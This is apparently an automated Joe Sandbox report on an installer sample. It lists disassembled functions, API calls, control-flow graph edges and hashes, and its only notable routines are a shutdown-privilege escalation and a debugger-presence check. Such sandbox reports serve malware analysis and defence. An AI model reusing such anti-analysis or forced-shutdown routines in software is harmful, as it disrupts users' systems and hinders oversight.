4669->4631 4718 6cc0c928-6cc0c938 4669->4718 4752 6cc0cc52-6cc0cc72 4670->4752 4697 6cc0cc77-6cc0cc88 4671->4697 4698 6cc0c6f7-6cc0c6fc 4671->4698 4696 6cc0ccbc-6cc0ccc4 4672->4696 4700 6cc0c758-6cc0c75d 4673->4700 4701 6cc0ccc9-6cc0ccd8 4673->4701 4719 6cc0c52c-6cc0c531 4674->4719 4720 6cc0c9bd-6cc0c9c5 4674->4720 4675->4720 4703 6cc0cce0-6cc0ccf5 4676->4703 4704 6cc0c7ac-6cc0c7b1 4676->4704 4707 6cc0c41d 4677->4707 4722 6cc0ca43-6cc0ca6c 4678->4722 4723 6cc0c59c-6cc0c5a1 4678->4723 4679->4722 4705 6cc0c7f4-6cc0c7f9 4680->4705 4706 6cc0cd28-6cc0cd67 4680->4706 4681->4631 4708 6cc0c846-6cc0c84b 4682->4708 4709 6cc0cd9d-6cc0cdad 4682->4709 4699 6cc0cd8a-6cc0cd98 4683->4699 4684->4631 4724 6cc0caa0-6cc0cb03 call 6cc0ce50 CreateFileA 4685->4724 4725 6cc0c5e0-6cc0c5e5 4685->4725 4702 6cc0cdc4-6cc0cdd5 4686->4702 4687->4710 4711 6cc0c879-6cc0c8a6 4687->4711 4688->4699 4712 6cc0c960-6cc0c975 4689->4712 4713 6cc0c468-6cc0c46d 4689->4713 4690->4631 4727 6cc0cb39-6cc0cb5c 4691->4727 4728 6cc0c659-6cc0c65e 4691->4728 4692->4631 4714 6cc0c8c1-6cc0c8dd 4692->4714 4693->4662 4694->4631 4695->4631 4730 6cc0c6a5-6cc0c6d1 4695->4730 4696->4631 4729 6cc0cc8d-6cc0cc9e 4697->4729 4698->4631 4731 6cc0c702-6cc0c73d 4698->4731 4699->4631 4700->4631 4732 6cc0c763-6cc0c791 4700->4732 4701->4703 4702->4631 4703->4707 4704->4631 4733 6cc0c7b7-6cc0c7d9 4704->4733 4705->4631 4734 6cc0c7ff-6cc0c82b 4705->4734 4706->4631 4735 6cc0c420-6cc0c424 4707->4735 4708->4631 4737 6cc0c851-6cc0c85e 4708->4737 4709->4686 4710->4631 4736 6cc0ce3c-6cc0ce47 4710->4736 4711->4631 4712->4631 4713->4631 4738 6cc0c46f-6cc0c483 4713->4738 4714->4729 4715->4631 4716->4631 4739 6cc0c4d2-6cc0c4fa call 6cc02a20 call 6cc02a30 4716->4739 4717->4735 4718->4702 4719->4631 4741 6cc0c537-6cc0c561 4719->4741 4740 6cc0c9ca-6cc0c9f9 4720->4740 4722->4631 4723->4631 4743 6cc0c5a7-6cc0c5ba 4723->4743 4724->4631 4725->4631 4745 6cc0c5eb-6cc0c633 4725->4745 4727->4631 4728->4631 4747 6cc0c664-6cc0c674 4728->4747 4729->4631 4730->4631 4731->4631 4732->4696 4733->4699 4734->4631 4735->4631 4737->4740 4738->4702 4739->4631 4740->4631 4741->4631 4743->4631 4745->4631 4747->4740 4752->4631
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @*Z$@*Z
                            • API String ID: 0-2842812045
                            • Opcode ID: 20ea75f8208d917bdad5307222d81d32e5bf9d5756741afe3df4f6080fd56dc2
                            • Instruction ID: d02d28f4a54008bee8536ec1b8dd94faaf6175b95e9ff9cfb7a4073516bf7763
                            • Opcode Fuzzy Hash: 20ea75f8208d917bdad5307222d81d32e5bf9d5756741afe3df4f6080fd56dc2
                            • Instruction Fuzzy Hash: AA4267706093428FCB14DF58C49166ABBE1BB89308F644D6EF49AC7B61E332D945CB23
                            Function 6CC4F015 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4755 6cc4f015-6cc4f029 call 6cc54c92 4758 6cc4f02f-6cc4f037 4755->4758 4759 6cc4f02b-6cc4f02d 4755->4759 4761 6cc4f042-6cc4f045 4758->4761 4762 6cc4f039-6cc4f040 4758->4762 4760 6cc4f07d-6cc4f09d call 6cc54e0f 4759->4760 4771 6cc4f09f-6cc4f0a9 call 6cc430e2 4760->4771 4772 6cc4f0ab 4760->4772 4765 6cc4f047-6cc4f04b 4761->4765 4766 6cc4f063-6cc4f073 call 6cc54c92 CloseHandle 4761->4766 4762->4761 4764 6cc4f04d-6cc4f061 call 6cc54c92 * 2 4762->4764 4764->4759 4764->4766 4765->4764 4765->4766 4766->4759 4774 6cc4f075-6cc4f07b GetLastError 4766->4774 4776 6cc4f0ad-6cc4f0b0 4771->4776 4772->4776 4774->4760
                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6CC5794F), ref: 6CC4F06B
                            • GetLastError.KERNEL32(?,00000000,?,6CC5794F), ref: 6CC4F075
                            • __dosmaperr.LIBCMT ref: 6CC4F0A0
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CloseErrorHandleLast__dosmaperr
                            • String ID:
                            • API String ID: 2583163307-0
                            • Opcode ID: ac7ea7c476724816c9c9527c81e3e52ac293dfc4e21a1ac6e807c68d2ec8719d
                            • Instruction ID: 7884b083eebc710465d282a60eb9f94eea3e888ecf00fec5667e28d4f3ff22f7
                            • Opcode Fuzzy Hash: ac7ea7c476724816c9c9527c81e3e52ac293dfc4e21a1ac6e807c68d2ec8719d
                            • Instruction Fuzzy Hash: 5D014E33F052202ED214523A99447AE77694BC373DF29C74AE919CBBC1FF6598674290
                            Function 6CC4428C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 5000 6cc4428c-6cc44297 5001 6cc442ae-6cc442bb 5000->5001 5002 6cc44299-6cc442ac call 6cc430bc call 6cc43810 5000->5002 5004 6cc442f6-6cc442ff call 6cc4e565 5001->5004 5005 6cc442bd-6cc442d2 call 6cc443a9 call 6cc4be2e call 6cc4d350 call 6cc4ef88 5001->5005 5013 6cc44300-6cc44302 5002->5013 5004->5013 5019 6cc442d7-6cc442dc 5005->5019 5020 6cc442e3-6cc442e7 5019->5020 5021 6cc442de-6cc442e1 5019->5021 5020->5004 5022 6cc442e9-6cc442f5 call 6cc47eab 5020->5022 5021->5004 5022->5004
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction ID: 0269abdc885f8d396473dd98c477584bab0b03f8d190c841e78b843c17580e9f
                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction Fuzzy Hash: 20F0F432901A205AE631DE799C00BDB33A99F8237CF35CB15E92493EC0FB30D50A86E1
                            Function 6CC39050 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC391A4
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC391E4
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID:
                            • API String ID: 323602529-0
                            • Opcode ID: 94fcb44a41b8f26372a89d2ea88a3a6d6f7718827ed551d04593cb7458ce1cc6
                            • Instruction ID: 4656128a82d73ce7c0d9f3d86fa70dec00599c963a40464b0a97e0c9e9ccfe25
                            • Opcode Fuzzy Hash: 94fcb44a41b8f26372a89d2ea88a3a6d6f7718827ed551d04593cb7458ce1cc6
                            • Instruction Fuzzy Hash: 83513871101B00DBD725CF25D984BE6BBF4BB09714F448A1CD4AE8BB91EB35B559CB80
                            Function 6CC4262F Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(6CC69DD0,0000000C), ref: 6CC42642
                            • ExitThread.KERNEL32 ref: 6CC42649
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorExitLastThread
                            • String ID:
                            • API String ID: 1611280651-0
                            • Opcode ID: 27e46de35f87ae7f0ae57259938b56c443c6bea10731209f8826f6c16652b29f
                            • Instruction ID: 4f38518efb7efb2ac50c4011b21d6abe45c27db4a455c4018305c6ecc2737c9d
                            • Opcode Fuzzy Hash: 27e46de35f87ae7f0ae57259938b56c443c6bea10731209f8826f6c16652b29f
                            • Instruction Fuzzy Hash: BBF0C270A00204AFDB009BB1C95DAAE3B74FF81314F24C559E50597B91EF74A945DBA1
                            Function 6CC4E662 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: f4ea74069ec92281a1d002224463bc321a14e5812bf8627e6a7a48075fb8b163
                            • Instruction ID: 6805e23866742bef0f9bb9c60d11d0b35062b9059ce54e5a4af6bc52c06904bc
                            • Opcode Fuzzy Hash: f4ea74069ec92281a1d002224463bc321a14e5812bf8627e6a7a48075fb8b163
                            • Instruction Fuzzy Hash: FC118C71A0420AAFCF05CF58E94499B7BF8EF49308F128069F808AB341E630ED11CBA4
                            Function 6CC576EE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction ID: 4bbb83a105ad5d3ba53103dfd7da4d4e2ba566e3f8a708262e7e73960f39fb14
                            • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction Fuzzy Hash: 28014F72C11159AFCF029FA89C00AEE7FB5AF08254F548165ED24E2251F7318A74EB95
                            Function 6CC57B47 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,6CC57805,?,?,00000000,?,6CC57805,00000000,0000000C), ref: 6CC57B64
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 695bb46f4b5544c438cd117711f81d85e2ca19b955b146409417fdc1ffa5dd7c
                            • Instruction ID: 745ee82895e86dce2094d947a7185b3902c8d8ac20e5c80229783a98670d6c6f
                            • Opcode Fuzzy Hash: 695bb46f4b5544c438cd117711f81d85e2ca19b955b146409417fdc1ffa5dd7c
                            • Instruction Fuzzy Hash: E0D06C3210014DBBDF028E85DD06EDA3BBAFB88715F014040BA1856020C732E861AB90
                            Function 6CB083A0 Relevance: 1.5, APIs: 1, Instructions: 1COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction ID: f673cee7e558603484e59f94a54a550eab0375e052f77db03109b7d8543fb22f
                            • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction Fuzzy Hash:

                            Non-executed Functions

                            Function 6CC34860 Relevance: 11.0, APIs: 3, Strings: 1, Instructions: 4048COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: C
                            • API String ID: 4218353326-4157497815
                            • Opcode ID: f82e13ef5ccc31c90b301d1b4839eba76d5f39ee82dec4ad1d1f9aa1ac4cfe77
                            • Instruction ID: 3d55e450150c8f962d734d7c1bcaab0f8dfc2e29fd90ba3a4d16cbb4f4953f71
                            • Opcode Fuzzy Hash: f82e13ef5ccc31c90b301d1b4839eba76d5f39ee82dec4ad1d1f9aa1ac4cfe77
                            • Instruction Fuzzy Hash: 2A730471644B018FC728CF29D8D0A96B7F2BF853187198B6DC09B87E95EB74B54ACB40
                            Function 6CC39450 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 31nativeshutdownCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 6CC3945A
                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CC39466
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CC39474
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CC3949B
                            • NtInitiatePowerAction.NTDLL ref: 6CC394AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3256374457-3733053543
                            • Opcode ID: f0c29db66eedf04088599477c38dbbde98e4518552ec48b952ae3e72214be223
                            • Instruction ID: 13bbfb83a9b669416c07973bee54dfd1a86b812d574cec95724eb217d20d6b92
                            • Opcode Fuzzy Hash: f0c29db66eedf04088599477c38dbbde98e4518552ec48b952ae3e72214be223
                            • Instruction Fuzzy Hash: 4BF0BB70644704FBF650AF24CE0EB5A7BBCEF46701F014508FA49A70C1D7706994CBA2
                            Function 6CAB1950 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 594COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: \j`7$\j`7$j
                            • API String ID: 0-3644614255
                            • Opcode ID: 5fee555cfaedef0713b56550febdf9447e6d84339c7030c91e7540823e1ba0c5
                            • Instruction ID: 83b6fd46da55addb86f41a2d341df9e0658217fc8818af871807e6ef421f244b
                            • Opcode Fuzzy Hash: 5fee555cfaedef0713b56550febdf9447e6d84339c7030c91e7540823e1ba0c5
                            • Instruction Fuzzy Hash: 1B4236756093828FC724CF68C480A6ABBE5BBC9354F284A1EE5D9E7760D334D885CB53
                            Function 6CC99CE0 Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1923COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC99CE5
                              • Part of subcall function 6CC6FC2A: __EH_prolog.LIBCMT ref: 6CC6FC2F
                              • Part of subcall function 6CC716A6: __EH_prolog.LIBCMT ref: 6CC716AB
                              • Part of subcall function 6CC99A0E: __EH_prolog.LIBCMT ref: 6CC99A13
                              • Part of subcall function 6CC99837: __EH_prolog.LIBCMT ref: 6CC9983C
                              • Part of subcall function 6CC9D143: __EH_prolog.LIBCMT ref: 6CC9D148
                              • Part of subcall function 6CC9D143: ctype.LIBCPMT ref: 6CC9D16C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog$ctype
                            • String ID:
                            • API String ID: 1039218491-3916222277
                            • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                            • Instruction ID: 94aac982c8ec828901b02367b5d124182c07cbe348afdf2e097393f2edb0d3a2
                            • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                            • Instruction Fuzzy Hash: 5203CD30C05289EFDF15DFA4C994BDCBBB0AF55308F248099D44967A91EB34AB89DF21
                            Function 6CC43871 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CC43969
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CC43973
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CC43980
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: a45ad72e487bedfb52437d0964bc607e0166c653bc6bab5db8a7cc557457be97
                            • Instruction ID: e0d3c6d6c326dd3ece4f590214aa81f1fbd9c4aa9fb77ddb91368218d042b765
                            • Opcode Fuzzy Hash: a45ad72e487bedfb52437d0964bc607e0166c653bc6bab5db8a7cc557457be97
                            • Instruction Fuzzy Hash: AE31D6749012289BCB21DF29D988BDDBBB8BF48314F5095EAE41CA7290E7709B858F44
                            Function 6CC4286D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,?,6CC42925,6CC3D339,00000003,00000000,6CC3D339,00000000), ref: 6CC4288F
                            • TerminateProcess.KERNEL32(00000000,?,6CC42925,6CC3D339,00000003,00000000,6CC3D339,00000000), ref: 6CC42896
                            • ExitProcess.KERNEL32 ref: 6CC428A8
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
